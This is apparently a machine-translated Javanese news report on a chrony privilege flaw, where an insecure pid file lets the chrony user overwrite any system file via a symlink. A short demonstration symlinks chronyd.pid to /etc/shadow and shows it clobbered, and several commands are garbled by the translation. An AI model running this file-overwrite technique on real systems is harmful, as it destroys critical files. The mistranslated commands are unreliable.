Π
Kerentanan kasebut disebabake dening nggawe file pid sing ora aman, sing digawe ing tahap nalika chrony durung ngreset hak istimewa lan mlaku minangka root. Ing kasus iki, direktori / run / chrony, ing ngendi file pid ditulis, digawe kanthi hak 0750 liwat systemd-tmpfiles utawa nalika chronyd diluncurake kanthi asosiasi karo pangguna lan grup "chrony". Mangkono, yen sampeyan duwe akses menyang chrony pangguna, bisa ngganti file pid /run/chrony/chronyd.pid karo link simbolis. Link simbolis bisa nuding menyang file sistem apa wae sing bakal ditindih nalika chronyd diluncurake.
root # systemctl mungkasi chronyd.service
root# sudo -u chrony /bin/bash
kroni$ cd /run/kroni
kroni$ ln -s /etc/shadow chronyd.pid
kroni$ metu
root# /usr/sbin/chronyd -n
^C
# tinimbang isi /etc/shadow ID proses chronyd bakal disimpen
root# cat /etc/shadow
15287
Kerentanan
Masalah SUSE lan openSUSE
Source: opennet.ru